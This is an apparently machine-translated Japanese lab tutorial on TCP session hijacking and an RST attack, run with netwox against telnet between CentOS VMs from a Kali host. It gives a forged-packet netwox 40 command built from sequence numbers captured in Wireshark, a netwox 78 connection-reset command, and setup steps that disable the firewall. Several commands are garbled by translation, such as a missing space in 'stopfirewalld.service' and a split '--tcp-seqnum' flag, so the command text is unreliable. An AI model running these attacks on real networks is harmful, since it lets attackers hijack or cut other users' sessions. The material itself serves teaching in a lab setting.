サイバーセキュリティ

netwoxツールを使用してLANでTCPセッションハイジャックとRST攻撃を実行します。手順は明確で、プロセスは簡単です。



Use Netwox Tool Carry Out Tcp Session Hijacking



telnetサービスを有効にする

telnetとxinetdがインストールされているかどうかを確認します
rpm -qa telnet-server
rpm -qa xinetd
インストールされていない場合は、最初にインストールしてください
インストールコマンド
yum install telnet-server
yum install xinetd
インストールが完了したら、xinetdサービスとtelnetサービスをブート自動起動に追加します
systemctl enable xinetd.service
systemctl enable telnet.socket
上記の2つのサービスを開始します
systemctl start telnet.socket
systemctl start xinetd
ファイアウォールをオフにすることを忘れないでください
systemctl stopfirewalld.service
ファイアウォールの起動を禁止する
systemctl disablefirewalld.service

この記事のネットワーク構造を紹介します

攻撃者はkaliで、IPは192.168.43.195です。
クライアントはcentos7で、IPは192.168.43.138です。
サーバーはcentos7で、IPは192.168.43.153です。
実験の前に、これら3つのホストが同じネットワークセグメント上にあることを確認してください
IPアドレスを表示するコマンドはipaddrです。
下の図のIPアドレスは192.168.43.138です。
画像
同じネットワークセグメントにない場合は、仮想マシン設定でブリッジモードに変更する必要があります-ネットワークアダプター
画像
失敗した場合は、VMwareツールバーの[編集]-仮想ネットワークエディタを選択します
画像
画像
デフォルト設定を復元することを選択します
または、仮想マシンのネットワークをDHCPに構成します。特定の手順については、Baiduにアクセスしてください。
上記のすべてが無効な場合(最後の手段として)、仮想マシンを再構築してブリッジモードを選択できます



TCPセッションハイジャック

kaliホストで最初に開いたwireshark(kaliにはwiresharkが付属しています)
sudo Wireshark(root権限で開く)
画像
共有ネットワークカードの監視を選択する
画像
フィルタ条件をtelnetパッケージとして選択します
画像クライアントがサーバーに接続します
画像
注:デフォルトでサーバーへのログインを許可されていないrootユーザー
カリはこの時点でtelnetパッケージをキャプチャしました
画像
クライアントへの最後のサーバーのメッセージ情報を表示します
送信元ポートが23、宛先ポートが36946であることがわかります。次のシーケンスは227906598です。Ackは972054647です。
この情報を使用して、クライアントからサーバーに送信されたパケットを偽造するための情報を決定します。ここでは、スリーウェイハンドシェイクの知識を使用する必要があります
下の図を使用して、実験で使用する必要のある関連知識を簡単に紹介します
画像
送り返す必要のあるパケットのseq値は、最後に受信したパケットのack値であり、ack値は最後に受信したパケットのNext seq値であることがわかります(図Nextseqの値はy +です1)
注:次の図に示すように、wiresharkによって表示されるNext seq値が相対的である場合は、プロトコル設定を右クリックして、相対シーケンス番号の前のチェックを削除します。
画像
上記の情報を取得した後、netwoxを使用してkaliホストでデータパケットを偽造します
コマンドは sudo netwox 40 --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.43.138 --ip4-dst 192.168.43.153 --tcp-src 36946 --tcp-dst 23- -tcp-seqnum 972054647 --tcp-acknum 227906598 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data '616263'
ここで、192.168.43.138はクライアントIP192.168.43.153はサーバーIP36946はクライアントのポート番号seqnumは上の図のAckの値acknumは上の図のNextseqの値616263はの16進表現ですabc、他のデータもデータで送信できます
画像
Wiresharkでは、クライアントからサーバーに送信されたabcデータを含むパケットがキャプチャされ、ハイジャックが成功したことを証明していることがわかります。
画像

RST攻撃

RSTフィールドはリセットを表し、異常な接続を閉じるために使用されます
簡単なコマンドsudonetwox 78 -i '192.168.43.138'
ここで、192.168.43.138はクライアントのIPアドレスです。
このとき、クライアントとサーバーが切断されていることがわかります
画像